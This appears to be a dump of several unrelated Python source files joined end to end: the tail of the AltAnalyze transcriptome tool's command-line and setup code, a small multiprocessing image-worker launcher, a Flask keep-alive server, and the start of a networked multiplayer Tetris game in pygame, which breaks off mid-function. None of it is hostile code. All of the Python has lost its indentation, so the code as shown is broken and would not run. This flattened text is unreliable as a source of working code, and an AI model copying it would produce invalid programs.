print "The probe set p-value file:\n"+input_stats_file+"\ndoes not have the same array order as the\nexpression file. Correct before proceeding."; sys.exit()
except Exception: print '\nWARNING...Expression file not found: "'+input_exp_file+'"\n\n'; sys.exit()
exp_name = string.replace(exp_name,'exp.',''); dataset_name = exp_name; exp_name = string.replace(exp_name,'.txt','')
groups_name = 'ExpressionInput/groups.'+dataset_name; comps_name = 'ExpressionInput/comps.'+dataset_name
groups_file_dir = output_dir+'/'+groups_name; comps_file_dir = output_dir+'/'+comps_name
groups_found = verifyFile(groups_file_dir)
comps_found = verifyFile(comps_file_dir)
if ((groups_found != 'found' or comps_found != 'found') and analyze_all_conditions != 'all groups') or (analyze_all_conditions == 'all groups' and groups_found != 'found'):
files_exported = UI.predictGroupsAndComps(cel_files,output_dir,exp_name)
if files_exported == 'yes': print "AltAnalyze inferred a groups and comps file from the CEL file names."
elif run_lineage_profiler == 'yes' and input_file_dir != None and pipelineAnalysis == False and ('--runLineageProfiler' in arguments or '--cellHarmony' in arguments): pass
else: print '...groups and comps files not found. Create before running AltAnalyze in command line mode.';sys.exit()
fl = UI.ExpressionFileLocationData(input_exp_file,input_stats_file,groups_file_dir,comps_file_dir)
dataset_name = exp_name
if analyze_all_conditions == "all groups":
try: array_group_list,group_db = UI.importArrayGroupsSimple(groups_file_dir,cel_files)
except Exception:
print '...groups and comps files not found. Create before running AltAnalyze in command line mode.';sys.exit()
print len(group_db), 'groups found'
if len(group_db) == 2: analyze_all_conditions = 'pairwise'
exp_file_location_db={}; exp_file_location_db[exp_name]=fl
elif run_from_scratch == 'Process CEL files' or run_from_scratch == 'Process RNA-seq reads' or run_from_scratch == 'Process Feature Extraction files':
if groups_file != None and comps_file != None:
try: shutil.copyfile(groups_file, string.replace(exp_file_dir,'exp.','groups.'))
except Exception: print 'Groups file already present in target location OR bad input path.'
try: shutil.copyfile(comps_file, string.replace(exp_file_dir,'exp.','comps.'))
except Exception: print 'Comparison file already present in target location OR bad input path.'
stats_file_dir = string.replace(exp_file_dir,'exp.','stats.')
groups_file_dir = string.replace(exp_file_dir,'exp.','groups.')
comps_file_dir = string.replace(exp_file_dir,'exp.','comps.')
groups_found = verifyFile(groups_file_dir)
comps_found = verifyFile(comps_file_dir)
if ((groups_found != 'found' or comps_found != 'found') and analyze_all_conditions != 'all groups') or (analyze_all_conditions == 'all groups' and groups_found != 'found'):
if mappedExonAnalysis: pass
elif len(input_fastq_dir)<0: ### Don't check for FASTQ to allow for fast expression quantification even if groups not present
files_exported = UI.predictGroupsAndComps(cel_files,output_dir,exp_name)
if files_exported == 'yes': print "AltAnalyze inferred a groups and comps file from the CEL file names."
#else: print '...groups and comps files not found. Create before running AltAnalyze in command line mode.';sys.exit()
fl = UI.ExpressionFileLocationData(exp_file_dir,stats_file_dir,groups_file_dir,comps_file_dir)
exp_file_location_db={}; exp_file_location_db[dataset_name]=fl
parent_dir = output_dir ### interchangable terms (parent_dir used with expression file import)
if analyze_all_conditions == "all groups":
array_group_list,group_db = UI.importArrayGroupsSimple(groups_file_dir,cel_files)
UI.exportGroups(exp_file_location_db,array_group_list)
print len(group_db), 'groups found'
if len(group_db) == 2: analyze_all_conditions = 'pairwise'
try: fl.setRunKallisto(input_fastq_dir)
except Exception: pass
elif run_from_scratch == 'Process AltAnalyze filtered':
if '.txt' in input_filtered_dir: ### Occurs if the user tries to load a specific file
dirs = string.split(input_filtered_dir,'/')
input_filtered_dir = string.join(dirs[:-1],'/')
fl = UI.ExpressionFileLocationData('','','',''); dataset_name = 'filtered-exp_dir'
dirs = string.split(input_filtered_dir,'AltExpression'); parent_dir = dirs[0]
exp_file_location_db={}; exp_file_location_db[dataset_name]=fl
for dataset in exp_file_location_db:
fl = exp_file_location_db[dataset_name]
file_location_defaults = UI.importDefaultFileLocations()
apt_location = UI.getAPTLocations(file_location_defaults,run_from_scratch,run_MiDAS)
fl.setAPTLocation(apt_location)
if run_from_scratch == 'Process CEL files':
if xhyb_remove == 'yes' and (array_type == 'gene' or array_type == 'junction'): xhyb_remove = 'no' ### This is set when the user mistakenly selects exon array, initially
fl.setInputCDFFile(input_cdf_file); fl.setCLFFile(clf_file); fl.setBGPFile(bgp_file); fl.setXHybRemoval(xhyb_remove)
fl.setCELFileDir(cel_file_dir); fl.setArrayType(array_type_original); fl.setOutputDir(output_dir)
elif run_from_scratch == 'Process RNA-seq reads':
fl.setCELFileDir(cel_file_dir); fl.setOutputDir(output_dir)
elif run_from_scratch == 'Process Feature Extraction files':
fl.setCELFileDir(cel_file_dir); fl.setOutputDir(output_dir)
fl = exp_file_location_db[dataset]; fl.setRootDir(parent_dir)
try: apt_location = fl.APTLocation()
except Exception: apt_location = ''
root_dir = fl.RootDir(); fl.setExonBedBuildStatus(build_exon_bedfile)
fl.setMarkerFinder(marker_finder)
fl.setFeatureNormalization(normalize_feature_exp)
fl.setNormMatrix(normalize_gene_data)
fl.setProbabilityStatistic(probability_statistic)
fl.setProducePlots(visualize_qc_results)
fl.setPerformLineageProfiler(run_lineage_profiler)
fl.setCompendiumType(compendiumType)
fl.setCompendiumPlatform(compendiumPlatform)
fl.setVendor(manufacturer)
try: fl.setFDRStatistic(FDR_statistic)
except Exception: pass
fl.setAnalysisMode('commandline')
fl.setBatchEffectRemoval(batch_effects)
fl.setChannelToExtract(channel_to_extract)
fl.setMultiThreading(multiThreading)
try: fl.setExcludeLowExpressionExons(excludeNonExpExons)
except Exception: fl.setExcludeLowExpressionExons(True)
if 'other' in manufacturer or 'Other' in manufacturer:
### For data without a primary array ID key
manufacturer = "other:3'array"
fl.setVendor(manufacturer)
if array_type == 'RNASeq': ### Post version 2.0, add variables in fl rather than below
fl.setRPKMThreshold(rpkm_threshold)
fl.setExonExpThreshold(exon_exp_threshold)
fl.setGeneExpThreshold(gene_exp_threshold)
fl.setExonRPKMThreshold(exon_rpkm_threshold)
fl.setJunctionExpThreshold(expression_threshold)
fl.setExonMapFile(exonMapFile)
fl.setPlatformType(platformType)
### Verify database presence
try: dirs = unique.read_directory('/AltDatabase')
except Exception: dirs=[]
if species not in dirs:
print '\n'+species,'species not yet installed. Please install before proceeding (e.g., "python AltAnalyze.py --update Official --species',species,'--version EnsMart75").'
global commandLineMode; commandLineMode = 'yes'
AltAnalyzeMain(expr_var, alt_var, goelite_var, additional_var, exp_file_location_db,None)
else:
print traceback.format_exc()
print 'Insufficient Flags entered (requires --species and --output)'
def cleanUpCommandArguments():
### Needed on PC
command_args = string.join(sys.argv,' ')
arguments = string.split(command_args,' --')
for argument in arguments:
"""
argument_list = string.split(argument,' ')
if len(argument_list)>2:
filename = string.join(argument_list[1:],' ')
argument = argument_list[0]+' '+string.replace(filename,' ','$$$')
"""
argument_list = string.split(argument,' ')
#argument = string.join(re.findall(r"\w",argument),'')
if ':' in argument: ### Windows OS
z = string.find(argument_list[1],':')
if z!= -1 and z!=1: ### Hence, it is in the argument but not at the second position
print 'Illegal parentheses found. Please re-type these and re-run.'; sys.exit()
def runCommandLineVersion():
### This code had to be moved to a separate function to prevent iterative runs upon AltAnalyze.py re-import
command_args = string.join(sys.argv,' ')
#try: cleanUpCommandArguments()
#except Exception: null=[]
#print 3,[sys.argv],
if len(sys.argv[1:])>0 and '--' in command_args:
if '--GUI' in command_args:
### Hard-restart of AltAnalyze while preserving the prior parameters
command_arguments = string.split(command_args,' --')
if len(command_arguments)>2:
command_arguments = map(lambda x: string.split(x,' '),command_arguments)
command_arguments = map(lambda (x,y): (x,string.replace(y,'__',' ')),command_arguments[2:])
selected_parameters = [command_arguments[0][1]]
user_variables={}
for (o,v) in command_arguments: user_variables[o]=v
AltAnalyzeSetup((selected_parameters,user_variables))
else:
AltAnalyzeSetup('no') ### a trick to get back to the main page of the GUI (if AltAnalyze has Tkinter conflict)
try:
commandLineRun()
except Exception:
print traceback.format_exc()
###### Determine Command Line versus GUI Control ######
command_args = string.join(sys.argv,' ')
if len(sys.argv[1:])>1 and '-' in command_args: null=[]
else:
try:
import Tkinter
from Tkinter import *
from visualization_scripts import PmwFreeze
import tkFileDialog
from tkFont import Font
use_Tkinter = 'yes'
except ImportError: use_Tkinter = 'yes'; print "\nPmw or Tkinter not found... Tkinter print out not available";
def testResultsPanel():
from visualization_scripts import QC
file = "/Users/nsalomonis/Desktop/code/AltAnalyze/datasets/3'Array/Merrill/ExpressionInput/exp.test.txt"
#QC.outputArrayQC(file)
global root; root = Tk()
global pathway_permutations; pathway_permutations = 'NA'
global log_file; log_file = 'null.txt'
global array_type; global explicit_data_type
global run_GOElite; run_GOElite = 'run-immediately'
explicit_data_type = 'exon-only'
array_type = 'RNASeq'
fl = UI.ExpressionFileLocationData('','','','')
graphic_links = []
graphic_links.append(['PCA','PCA.png'])
graphic_links.append(['HC','HC.png'])
graphic_links.append(['PCA1','PCA.png'])
graphic_links.append(['HC1','HC.png'])
graphic_links.append(['PCA2','PCA.png'])
graphic_links.append(['HC2','HC.png'])
graphic_links.append(['PCA3','PCA.png'])
graphic_links.append(['HC3','HC.png'])
graphic_links.append(['PCA4','PCA.png'])
graphic_links.append(['HC4','HC.png'])
summary_db={}
summary_db['QC'] = graphic_links
#summary_db={}
fl.setGraphicLinks(graphic_links)
summary_db['gene_assayed'] = 1
summary_db['denominator_exp_genes'] = 1
summary_db['alt_events'] = 1
summary_db['denominator_exp_events'] = 1
summary_db['alt_events'] = 1
summary_db['denominator_exp_events'] = 1
summary_db['alt_events'] = 1
summary_db['denominator_exp_events'] = 1
summary_db['alt_genes'] = 1
summary_db['direct_domain_genes'] = 1
summary_db['miRNA_gene_hits'] = 1
#summary_db={}
print_out = 'Analysis complete. AltAnalyze results\nexported to "AltResults/AlternativeOutput".'
dataset = 'test'; results_dir=''
print "Analysis Complete\n";
if root !='' and root !=None:
UI.InfoWindow(print_out,'Analysis Completed!')
tl = Toplevel(); SummaryResultsWindow(tl,'GE',results_dir,dataset,'parent',summary_db)
#sys.exit()
class Logger(object):
def __init__(self,null):
self.terminal = sys.stdout
self.log = open(log_file, "w")
def write(self, message):
self.terminal.write(message)
self.log = open(log_file, "a")
self.log.write(message)
self.log.close()
def flush(self): pass
class SysLogger(object):
def __init__(self,null):
self.terminal = sys.stdout
self.log = open(sys_log_file, "w")
def write(self, message):
self.terminal.write(message)
self.log = open(sys_log_file, "a")
self.log.write(message)
self.log.close()
def flush(self): pass
def verifyPath(filename):
### See if the file is in the current working directory
new_filename = filename
cwd = os.getcwd()
try:
files = unique.read_directory(cwd)
if filename in files:
new_filename = cwd+'/'+new_filename
except Exception:
pass
try:
### For local AltAnalyze directories
if os.path.isfile(cwd+'/'+filename):
new_filename = cwd+'/'+filename
else:
files = unique.read_directory(cwd+'/'+filename)
new_filename = cwd+'/'+filename
except Exception:
#print traceback.format_exc()
pass
return new_filename
def dependencyCheck():
### Make sure core dependencies for AltAnalyze are met and if not report back
from pkgutil import iter_modules
modules = set(x[1] for x in iter_modules()) ### all installed modules
dependent_modules = ['string','csv','base64','getpass','requests']
dependent_modules += ['warnings','sklearn','os','webbrowser']
dependent_modules += ['scipy','numpy','matplotlib','igraph','pandas','patsy']
dependent_modules += ['ImageTk','PIL','cairo','wx','fastcluster','pysam', 'Tkinter']
dependent_modules += ['networkx','numba','umap','nimfa','lxml','annoy','llvmlite']
print ''
count=0
for module in dependent_modules:
if module not in modules:
if 'ImageTk' != module and 'PIL' != module:
print 'AltAnalyze depedency not met for:',module
if 'fastcluster' == module:
print '...Faster hierarchical cluster not supported without fastcluster'
if 'pysam' == module:
print '...BAM file access not supported without pysam'
if 'scipy' == module:
print '...Many required statistical routines not supported without scipy'
if 'numpy' == module:
print '...Many required statistical routines not supported without numpy'
if 'matplotlib' == module:
print '...Core graphical outputs not supported without matplotlib'
if 'requests' == module:
print '...Wikipathways visualization not supported without requests'
if 'lxml' == module:
print '...Wikipathways visualization not supported without lxml'
if 'wx' == module:
print '...The AltAnalyze Results Viewer requires wx'
if 'ImageTk' == module or 'PIL' == module:
if 'PIL' not in dependent_modules:
print 'AltAnalyze depedency not met for:',module
print '...Some graphical results displays require ImageTk and PIL'
if 'Tkinter' == module:
print '...AltAnalyze graphical user interface mode requires Tkinter'
if 'igraph' == module or 'cairo' == module:
print '...Network visualization requires igraph and cairo'
if 'sklearn' == module:
print '...t-SNE analysis requires sklearn'
if 'pandas' == module or 'patsy' == module:
print '...Combat batch effects correction requires pandas and patsy'
count+=1
if count>1:
print '\nWARNING!!!! Some dependencies are not currently met.'
print "This may impact AltAnalyze's performance\n"
def unpackConfigFiles():
""" When pypi installs AltAnalyze in site-packages, a zip file for the Config
and AltDatabase in the pypi installed AltAnalyze library directory. To allow
for different flexible database versions to be written, AltDatabase and Config
are written to the user home directory in the folder 'altanalyze'."""
fn = filepath('Config/options.txt') ### See if a Config folder is already available
fileExists = os.path.isfile(fn)
if fileExists == False:
import subprocess
import shutil
import site
import zipfile
from os.path import expanduser
userdir = expanduser("~")
try:
os.mkdir(userdir+"/altanalyze")
except:
pass
config_filepath = filepath("Config.zip")
altdatabase_filepath = string.replace(config_filepath,'Config.zip','AltDatabase.zip')
print '...Creating Config directory in:',userdir+"/altanalyze",
with zipfile.ZipFile(config_filepath,"r") as zip_ref:
zip_ref.extractall(userdir+"/altanalyze")
with zipfile.ZipFile(altdatabase_filepath,"r") as zip_ref:
zip_ref.extractall(userdir+"/altanalyze")
print '...written'
def systemLog():
global sys_log_file
sys_log_file = filepath('Config/report.log')
sys_report = open(sys_log_file,'w'); sys_report.close()
sys.stdout = SysLogger('')
def versionCheck():
import platform
if platform.system()=='Darwin':
if platform.mac_ver()[0] == '10.14.6':
print 'CRITICAL ERROR. AltAanlyze has a critical incompatibility with this specific OS version.'
url = 'http://www.altanalyze.org/MacOS-critical-error.html'
try: webbrowser.open(url)
except Exception: pass
sys.exit()
if __name__ == '__main__':
try: mlp.freeze_support()
except Exception: pass
systemLog()
sys_log_file = filepath('Config/report.log')
print 'Using the Config location:',sys_log_file
versionCheck()
try: unpackConfigFiles()
except: pass
#testResultsPanel()
skip_intro = 'yes'; #sys.exit()
#skip_intro = 'remoteViewer'
dependencyCheck()
try:
runCommandLineVersion()
if use_Tkinter == 'yes':
AltAnalyzeSetup(skip_intro)
except:
if 'SystemExit' not in traceback.format_exc():
print traceback.format_exc()
""" To do list:
3) SQLite for gene-set databases prior to clustering and network visualization
7) (partially) Integrate splicing factor enrichment analysis (separate module?)
17) Support R check (and response that they need it) along with GUI gcrma, agilent array, hopach, combat
19) Update the software from the software
Advantages of this tool kit:
0) Easiest to use, hands down
1) Established and novel functionality for transcriptome/proteomics analysis built in
2) Independent and cooperative options for RNA-Seq and array analysis (splicing and gene expression)
3) Superior functional analyses (TF-target, splicing-factor target, lineage markers, WikiPathway visualization)
4) Options for different levels of users with different integration options (multiple statistical method options, option R support)
5) Built in secondary analysis options for already processed data (graphing, clustering, biomarker discovery, pathway analysis, network visualization)
6) Incorporates highly validated alternative exon identification methods, independent and jointly
Primary Engineer Work:
0) C-library calls and/or multithreading where applicable to improve peformance.
1) MySQL or equivalent transition for all large database queries (e.g., HuEx 2.1 on-the-fly coordinate mapping).
3) Isoform-domain network visualization and WP overlays.
4) Webservice calls to in silico protein translation, domain prediction, splicing factor regulation.
"""
|
run.py | import settings
import sys
try:
sys.path.extend(settings.libs)
except AttributeError:
pass
from multiprocessing import Process
if __name__ == '__main__':
from worker import ImgprocWorker
for i in xrange(settings.workers - 1):
p = Process(target=ImgprocWorker)
p.start()
ImgprocWorker()
|
keepalive.py | from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello. I am alive!"
def run():
app.run(host='0.0.0.0',port=8080)
def keepalive():
t = Thread(target=run)
t.start()
|
masstris.py | import pygame
import threading
import multiprocessing
import time
import sys
import random
import os
import glob
from collections import deque
import graphics
import player_game
import display_game
import networking
import ai
class Screen:
"""
Base class for game screens
"""
def __init__(self):
global display
self.next = self
self.is_connected = False
def switch_to(self, next_screen):
""""""
self.next = next_screen
def process_events(self):
""""""
pass
def process_input(self):
""""""
def update_display(self):
""""""
pass
def receive(self):
""""""
pass
def send(self):
""""""
pass
def process_AI(self):
pass
class MainScreen(Screen):
"""
Main screen for game selection
"""
from data import menu_items
def __init__(self):
super().__init__()
global network
self.host_data = {}
self.selection = 0
self.next = self
self.status_update_time = None
# Music
global music
if music:
play_next_song(menu=True)
def process_events(self):
"""
Update broadcast data based on current settings
"""
global local_players_count
global max_games
global run_AI
network.my_data = {'status': network.task,
'host': network.host_name,
'players': local_players_count,
'max': max_games,
'AI': run_AI}
def process_input(self):
"""
Process all relevant pygame events and update game state
"""
global run_AI
for event in pygame.event.get():
if event.type == pygame.QUIT:
quit_game()
elif event.type == pygame.KEYDOWN:
try:
action = menu_keys[pygame.key.name(event.key)]
if action == 'quit':
quit_game()
elif action == 'move_right':
self.move_right()
elif action == 'move_left':
self.move_left()
elif action == 'move_up':
self.move_up()
elif action == 'move_down':
self.move_down()
elif action == 'validate':
self.validate()
elif action == 'ai toggle':
global run_AI
run_AI = not run_AI
except:
pass
elif event.type == pygame.JOYHATMOTION:
if event.value[0] == -1:
self.move_left()
elif event.value[0] == 1:
self.move_right()
elif event.value[1] == 1:
self.move_up()
elif event.value[1] == -1:
self.move_down()
elif event.type == pygame.JOYBUTTONDOWN:
if event.button == 0:
self.validate()
if event.button == 3:
run_AI = not run_AI
def update_display(self):
"""
Call graphics routine
"""
global run_AI
display.main_screen(self.selection, local_players_count, run_AI)
def move_up(self):
if self.selection > 0:
self.selection -= 1
def move_down(self):
if self.selection < len(self.menu_items) - 1:
self.selection += 1
def move_right(self):
global local_players_count
if local_players_count < max_actives:
local_players_count += 1
def move_left(self):
global local_players_count
if local_players_count > 1:
local_players_count -= 1
def validate(self):
if self.selection == 2:
quit_game()
elif self.selection == 1:
is_connected = True
else:
is_connected = False
# force update our status before moving on
self.process_events()
self.next = LoadScreen(is_connected)
class LoadScreen(Screen):
"""
Object controlling the networking aspect:
Simple passthrough for local only, controlled by main loop for network game
"""
from data import time_to_expire
def __init__(self, is_connected=False):
"""
Prepare needed variables
Call for start of game screen if local only
"""
super().__init__()
global display
global network
self.is_connected = is_connected
if not is_connected:
# start solo game
network.task = 'scan'
game_data = self.dispatcher()
self.next = GameScreen(game_data, is_master=True, is_connected=False)
self.game_started = False
def process_input(self):
"""
Check pygame events for starting a game
"""
for event in pygame.event.get():
if event.type == pygame.QUIT:
quit_game()
if event.type == pygame.KEYDOWN:
try:
action = menu_keys[pygame.key.name(event.key)]
if action == 'quit':
network.task = 'reset'
self.next = MainScreen()
else:
network.my_data['status'] = 'start'
except:
pass
def process_events(self):
"""
Check if a game has been initiated by a host and manage synchronization
"""
def find_main_host():
"""
Return key for best host for AI, dispatch and other centralized gameplay functions
Deterministic
"""
host_data = network.host_data
best_pick = None
for IP in host_data:
# set best_pick to first element if None
if best_pick is None:
best_pick = IP
# for all the hosts that can run AI
if host_data[IP]['AI'] is True:
# pick highest max
if host_data[IP]['max'] > host_data[best_pick]['max']:
best_pick = IP
# if equal pick max host
if host_data[IP]['max'] == host_data[best_pick]['max']:
if max(host_data[IP]['host'], host_data[best_pick]['host']) == host_data[IP]['host']:
best_pick = IP
return best_pick
def decode_game_data(encoded_data=''):
"""
Decode remote game data and return it
In the form:
'host1%start_range%end_range&host2%start_range%end_range...'
"""
decoded_data = {}
try:
hosts = encoded_data.split('&')
for host in hosts:
items = host.split('%')
decoded_data[items[0]] = {'start_range': int(items[1]), 'end_range': int(items[2])}
except (KeyError, IndexError):
pass
return decoded_data
if self.game_ready():
# check whether this host is the master
master_IP = find_main_host()
is_master = bool(master_IP == network.my_IP)
if is_master:
# set up game data
network.game_data = self.dispatcher(True)
# sync up other games
network.task = 'sync_master'
# Delay to give clients a headstart
time.sleep(1)
else:
# sync with master
network.task = 'sync'
time_out = time.process_time()
while time.process_time() - time_out < self.time_to_expire:
ready = True
for ready_item in network.sync_status:
if not ready_item:
ready = False
if ready:
decoded_data = decode_game_data(network.game_data)
# Make certain this host is in game and join
if network.my_IP in decoded_data:
self.next = GameScreen(decoded_data, is_master, self.is_connected)
network.task = 'game'
return
else:
# Reset scan results
for IP in network.host_data:
network.host_data[IP]['status'] = ''
# If something failed
network.task = 'reset'
self.next = MainScreen()
def game_ready(self):
"""
Check if any game on host data started a game and return True if found
"""
for IP in network.host_data:
if network.host_data[IP]['status'] == 'start':
return True
return False
def dispatcher(self, encode=False):
"""
Assign all hosts to a range of game IDs based on their advertised capabilities
Encode game data if needed
Return game data
"""
def encode_game_data(data):
"""
Encode game data into a string for network transmission
Each host data separated by '&', each element within separated by '%'
"""
encoded = ''
for host in data:
encoded = encoded + host + '%' + str(data[host]['start_range']) + '%' + str(data[host]['end_range']) + '&'
# Drop final separation character
return encoded[:-1]
game_data = {}
game_ID = 0
# local only
game_data[network.my_IP] = {}
game_data[network.my_IP]['start_range'] = game_ID
for _ in range(local_players_count):
game_ID += 1
game_data[network.my_IP]['end_range'] = game_ID - 1
if self.is_connected:
# multiplayer game
for IP in network.host_data:
if IP != network.my_IP:
game_data[IP] = {}
game_data[IP]['start_range'] = game_ID
global max_games
if network.host_data[IP]['players'] + game_ID <= max_games:
for _ in range(network.host_data[IP]['players']):
game_ID += 1
game_data[IP]['end_range'] = game_ID - 1
else:
break
game_data['AI'] = {}
game_data['AI']['start_range'] = game_ID
if run_AI:
# As many as allowed
game_data['AI']['end_range'] = max_games - 1
else:
# None
game_data['AI']['end_range'] = game_ID
if encode:
return encode_game_data(game_data)
else:
return game_data
def update_display(self):
"""
Call graphic routine
"""
if self.is_connected:
display.load_screen(network.host_data)
class TitleScreen(Screen):
"""
Screen for the title scene before main menu
"""
def __init__(self):
super().__init__()
display.set_up_title()
def process_input(self):
"""
Process all relevant inputs:
Any button triggers next screen
"""
for event in pygame.event.get():
if event.type == pygame.KEYDOWN or event.type == pygame.JOYBUTTONDOWN:
self.next = MainScreen()
def update_display(self):
"""
Call graphics
"""
display.title_screen()
class GameScreen(Screen):
"""
Where the magic happens!
Object controlling the set up and organization of a Tetris game, meant to be called from main loop
"""
from data import side_moves_per_second
def __init__(self, game_data=None, is_master=False, is_connected=False):
"""
Prepare required variables
Set up the data structures for the games
Set up graphics for all games
"""
super().__init__()
global display
global network
self.is_connected = is_connected
self.is_master = is_master
self.pause_triggered = False
self.winner = None
self.updated_boards = deque()
self.ready_games = {}
self.lost_range = []
# Something went wrong...
if game_data is None:
self.next = MainScreen()
# Prep the games
self.games, self.active_games, self.AI_games, self.remote_games = self.new_game_setup(game_data)
# Prep the graphic engine
global backgrounds
if backgrounds is not None:
background = backgrounds[0]
random.shuffle(backgrounds)
else:
background = None
display.set_up(len(self.games), self.active_range, self.remote_range, background=background)
# Music
global music
if music:
play_next_song()
def new_game_setup(self, game_data=None):
"""
Necessary tasks to organize a new game
Calculate shifts so local games are always displayed from top left
Populate the AI, remote, active and display game lists that will be iterated with newly created games
"""
if game_data is None:
game_data = {}
# How much local games are shifted
self.my_offset = game_data[network.my_IP]['start_range']
# games actually played on local machine
self.active_range = list(range(game_data[network.my_IP]['start_range'] - self.my_offset, game_data[network.my_IP]['end_range'] - self.my_offset + 1))
if self.is_master:
# remote games from end of active range to beginning of AI range
self.remote_offset = 0
if self.is_connected:
self.remote_range = list(range(game_data[network.my_IP]['end_range'] + 1, game_data['AI']['start_range']))
else:
self.remote_range = []
global run_AI
if run_AI:
self.AI_range = list(range(game_data['AI']['start_range'], game_data['AI']['end_range'] + 1))
else:
self.AI_range = []
else:
# To allow local games to always be first displayed
self.remote_offset = game_data[network.my_IP]['end_range'] - game_data[network.my_IP]['start_range'] + 1
# Remote = before active range, and between active range and AI
self.remote_range = []
for game in range(0 + self. remote_offset, game_data[network.my_IP]['end_range'] + 1):
self.remote_range.append(game)
for game in range(game_data[network.my_IP]['end_range'] + 1, game_data['AI']['end_range'] + 1):
self.remote_range.append(game)
# AI range null
self.AI_range = []
# Prepare the data structures
active_games = []
AI_games = []
remote_games = []
games = []
for _ in range(len(self.active_range) + len(self.remote_range) + len(self.AI_range)):
active_games.append(None)
AI_games.append(None)
remote_games.append(None)
games.append(None)
global ghost
now = time.process_time()
for index in range(len(games)):
# Populate actively played games
if index in self.active_range:
new_local_game = player_game.ActiveBoard(ghost)
new_display_game = display_game.Board(ghost)
active_games[index] = new_local_game
games[index] = new_display_game
# Populate remote games
elif index in self.remote_range and self.is_connected:
new_display_game = display_game.Board(ghost=False)
remote_games[index] = new_display_game
games[index] = new_display_game
# Populate AI games
elif index in self.AI_range and self.is_master and run_AI:
new_AI_game = player_game.ActiveBoard(ghost=False)
new_display_game = display_game.Board(ghost=False)
AI_games[index] = new_AI_game
games[index] = new_display_game
# Delay first move to avoid early performance bottlenecks
self.ready_games[index] = now + random.randint(100, 300) / 200
else:pass
# Network game started with no other hosts
if self.remote_range == []:
self.is_connected = False
# For continuous lateral movement
self.lateral_timers = {}
return games, active_games, AI_games, remote_games
def update_display(self):
"""
Call graphic routine and clear updated boards tracker
"""
if len(self.updated_boards) > 0:
display.draw(self.games, self.updated_boards, self.winner)
self.updated_boards.clear()
def process_input(self):
"""
Process gameplay input
Iterate through each input event to apply appropriate gameplay action
Keyboard: Each key is linked to a specific game
Gamepads/Joysticks: each is linked to a specific game
Return whether gameplay is paused
"""
#Process all pygame events
now = time.process_time()
for event in pygame.event.get():
global players_with_sound
if event.type == pygame.QUIT:
quit_game()
elif event.type == SONG_END:
play_next_song()
# Keyboard button pressed
elif event.type == pygame.KEYDOWN:
try:
game_ID, action = game_keys[pygame.key.name(event.key)]
if action == 'quit':
self.next = MainScreen()
if self.active_games[game_ID] is not None:
if action == 'pause' and self.is_master and not self.is_connected:
self.pause_triggered = not self.pause_triggered
elif self.pause_triggered:
return self.pause_triggered
elif action == 'move right':
if game_ID < players_with_sound:
play_sound_effect('move')
self.lateral_timers[game_ID] = ('right', now)
self.active_games[game_ID].move_right()
elif action == 'move left':
if game_ID < players_with_sound:
play_sound_effect('move')
self.lateral_timers[game_ID] = ('left', now)
self.active_games[game_ID].move_left()
elif action == 'turn counter-clockwise':
if game_ID < players_with_sound:
play_sound_effect('turn')
self.active_games[game_ID].turn_counter_clockwise()
elif action == 'turn clockwise':
if game_ID < players_with_sound:
play_sound_effect('turn')
self.active_games[game_ID].turn_clockwise()
elif action == 'speed up':
self.active_games[game_ID].speed_up(True)
elif action == 'hard drop':
if game_ID < players_with_sound:
play_sound_effect('drop')
self.active_games[game_ID].drop()
elif action == 'hold':
if game_ID < players_with_sound:
play_sound_effect('store')
self.active_games[game_ID].store_piece()
elif action == 'light up':
self.games[game_ID].light_speed_flag = True
self.updated_boards.append(game_ID)
except:
pass
# Keyboard key released
elif event.type == pygame.KEYUP:
try:
game_ID, action = game_keys[pygame.key.name(event.key)]
if self.active_games[game_ID] != None:
if action == 'light up':
self.games[game_ID].light_speed_flag = False
self.updated_boards.append(game_ID)
elif action == 'speed up':
self.active_games[game_ID].speed_up(False)
elif action == 'move left':
del self.lateral_timers[game_ID]
elif action == 'move right':
del self.lateral_timers[game_ID]
except:
pass
# Gamepad Hat movement
elif event.type == pygame.JOYHATMOTION:
try:
game_ID = joysticks[event.joy]
if event.value[0] == -1:
if game_ID < players_with_sound:
play_sound_effect('move')
self.active_games[game_ID].move_left()
self.lateral_timers[game_ID] = ('left', now)
elif event.value[0] == 1:
if game_ID < players_with_sound:
play_sound_effect('move')
self.active_games[game_ID].move_right()
self.lateral_timers[game_ID] = ('right', now)
elif event.value[0] == 0:
del self.lateral_timers[game_ID]
elif event.value[1] == 1: # HAT up
if game_ID < players_with_sound:
play_sound_effect('drop')
self.active_games[game_ID].drop()
elif event.value[1] == -1: # HAT down
if game_ID < players_with_sound:
play_sound_effect('drop')
self.active_games[game_ID].drop()
except:
pass
# Gamepad button pressed
elif event.type == pygame.JOYBUTTONDOWN:
game_ID = joysticks[event.joy]
if event.button == 0:
if game_ID < players_with_sound:
play_sound_effect('drop')
self.active_games[game_ID].drop()
elif event.button == 2:
if game_ID < players_with_sound:
play_sound_effect('turn')
self.active_games[game_ID].turn_counter_clockwise()
elif event.button == 1:
if game_ID < players_with_sound:
play_sound_effect('turn')
self.active_games[game_ID].turn_clockwise()
elif event.button == 3:
if game_ID < players_with_sound:
play_sound_effect('store')
self.active_games[game_ID].store_piece()
elif event.button == 5:
self.active_games[game_ID].speed_up(True)
elif event.button == 4:
self.games[game_ID].light_speed_flag = True
self.updated_boards.append(game_ID)
# Gamepad button released
elif event.type == pygame.JOYBUTTONUP:
game_ID = joysticks[event.joy]
if event.button == 4:
self.games[game_ID].light_speed_flag = False
self.updated_boards.append(game_ID)
elif event.button == 5:
self.active_games[game_ID].speed_up(False)
# Track which games are still attempting button held down type moves and check if they are ready to act again
for game in self.lateral_timers:
if self.lateral_timers[game][0] == 'left' and now - self.lateral_timers[game][1] > 1 / self.side_moves_per_second:
if game < players_with_sound:
play_sound_effect('move')
self.active_games[game].move_left()
self.lateral_timers[game] = ('left', now)
elif self.lateral_timers[game][0] == 'right' and now - self.lateral_timers[game][1] > 1 / self.side_moves_per_second:
if game < players_with_sound:
play_sound_effect('move')
self.active_games[game].move_right()
self.lateral_timers[game] = ('right', now)
return self.pause_triggered
def process_events(self):
"""
Process all the various events of this frame:
-All reports for each game
-Perform end of tick maintenance
-End if winning condition
"""
def process_reports(reports, game_ID, broadcast):
"""
Loop through all reports in the queue for a given game.
Manage data as needed for each (update display, score...)
Broadcast update if needed (remote games)
Clear report queue on exit
Return True if game is still ongoing, False if it lost
"""
def encode_board(report):
"""
Encode board data report for network transmission
Board report in the form of (game_ID, board_data)
Result is a string where each line is separated by ':'
Return report as (game_ID, encoded_board)
"""
# Create a string from each element in a row, for each row
